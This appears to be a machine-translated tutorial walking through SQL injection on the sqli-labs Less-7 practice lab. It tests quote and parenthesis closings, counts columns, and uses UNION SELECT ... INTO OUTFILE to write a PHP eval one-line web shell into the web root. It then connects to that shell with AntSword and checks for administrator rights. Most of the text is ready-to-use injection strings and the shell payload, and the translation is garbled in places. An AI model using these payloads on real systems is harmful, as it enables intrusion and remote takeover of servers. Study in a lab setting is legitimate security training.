#Main knowledge points
1.show variables like '%secure%'; used to check whether mysql has read and write permissions
If the parameter at this position is null, it means that the function of reading and writing files cannot be used
2. The file permission of the database specifies whether the database user has permission to write and read existing permissions in the operating system;
3. Into outfile command usage environment: You must know one, the full path of the folder on the server where files can be written
#File upload command
<?php @eval($_POST['x'])?> is a one-sentence Trojan horse
#File upload usage
The purpose is to upload a sentence Trojan horse to the server
1. You can directly use a one-sentence Trojan horse link in the directory of the website
2. If you find that the target website has a file containing a loophole, and at the same time, the database has the authority to write a one-sentence Trojan horse. Use file inclusion to directly include the file you wrote a sentence of Trojan horse. Maybe it is not in the root directory of our website, but it can be under any path of the website target server. We can use file inclusion to trigger our writing A word Trojan exploit.
#File upload command
?id=-1')) union select 1,2,"<?php @eval($_POST['x']);?>" into outfile "D:\\phpStudy\\WWW\\haha.php" --+
"<?php @eval($_POST['x']);?>" : The written content is a one-sentence Trojan horse, and x is the password reserved for using Ant Sword later
into outfile: function for writing or exporting
"D:\\phpStudy\\WWW\\: the path to write
haha.php: the file name of the generated file
Note: "<?php @eval($_POST['x']);?>" Like this function, we wrap it with double quotes outside, and the parameter x inside should not use double quotes anymore, but wrap it in, so as not to The machine does not recognize clearly
#case demo
sqli-labs-master/Less-7/
1. Judging the closing method
First throw a parameter in
The page shows: you are in...use outfile
digital test
url:?id=1 and 1=1
The page is normal you are in
url:?id=1 and 1=2
The page is displayed normally without error
If there is no protection, it is basically determined that he is a character type
Because of the character type, the background statement is
seletc * from database.tables where id='1 and 1=2' The injection statement will be treated as a string, and the function will not work
first test
Determine whether to use ' single quotes to enter and close
url:id=1'
Throw a ' into it, the page prompts an error report, but there is no error report content echoed
url:/?id=1' --+
Use --+ to comment out the following content. If the page shows you are in, it proves that he closed it with '.
But judging from the display of the page, he does not use ' single quotation marks to close
The second test (judging whether to use " double quotes to close)
url:?id=1" --+
The page shows you are in...
url:?id=1" and 1=2 --+
Using and 1=2, make sure again.
If the page is an error statement, use "double quotes to close.
Because guessing his sql statement
Because and 1=2 does not hold
Make sure you don't use " to close
But the page here still echoes you are in normally. Why?
Because he may be wrapped with ' 'single quotes, so you typed " was escaped by him
For example, his background original sql statement is
select *from database.table whre id='1'
Maybe after you type it, it becomes
select *from database.tables where id='1" --+'
Since it is wrapped in single quotes, it is possible that the "--+" you entered was filtered out by other systems or developed codes
The "--+" you entered is automatically filtered out for you, so the select you belong to *from database.tables where id='1 " --+ ' was messed up by himself later, and then restored to the original sql statement select *from database.table whre id='1'
Then the statement select *from database.table whre id='1' is normal, so the page is echoed normally
So we have to use and 1=1 and and 1=2 again to judge
Make a third test (using ') single quotes for parentheses)
url:?id=1') --+
The page still reports an error
Do a fourth test (use ") double quotes with parentheses)
url:?id=1”) --+
show you are in
url:?id=1”) and 1=2 --+
Confirm again with and 1=2
The page is still displayed normally you are in
Make a fifth test (use ')) double quotes plus parentheses)
url:?id=1')) --+
The page shows you are in normal
url:?id=1')) and 1=2 --+
Use and1=2 to judge again
Page error to determine the closing method'))
2. Query the number of fields (order by or group by)
url:?id=1')) group by 4 --+
page returns error
The page normally displays you are in without reporting an error
With this conclusion there are 3 fields
4. Write a sentence Trojan horse
url:
?id=-1')) union select 1,2,"<?php @eval($_POST['x']);?>" into outfile "D:\\phpStudy\\WWW\\haha.php" --+
Note: The written content can be written in that field, I am writing in 3, 2, 1 can be written
After execution, the website page will report an error, but it will not affect it. If your command statement is correct, then it will succeed.
At this time, a haha.php file is generated under the directory
Check the content, at this point our one-sentence code has been successfully written into it
5. Use Ant Sword to connect
Click on the .exe file
Right click on the blank space -> Add Data
The haha.php behind url: is the file name generated by writing a sentence of code earlier
x: It is also the parameter of the connection password we write in the back of a sentence
Click Test Connection -> Show Success
click to add
connection succeeded
The target server is equivalent to being remotely controlled by us
Because Xiaopi this program we give administrator privileges
Use whoami to determine if you have administrative privileges. Make sure to use administrator privileges, which means that this computer is basically operated by us, because administrator is the highest privilege
If you feel that the details are not enough, you can go to https://mp.csdn.net/mp_blog/creation/editor/129723083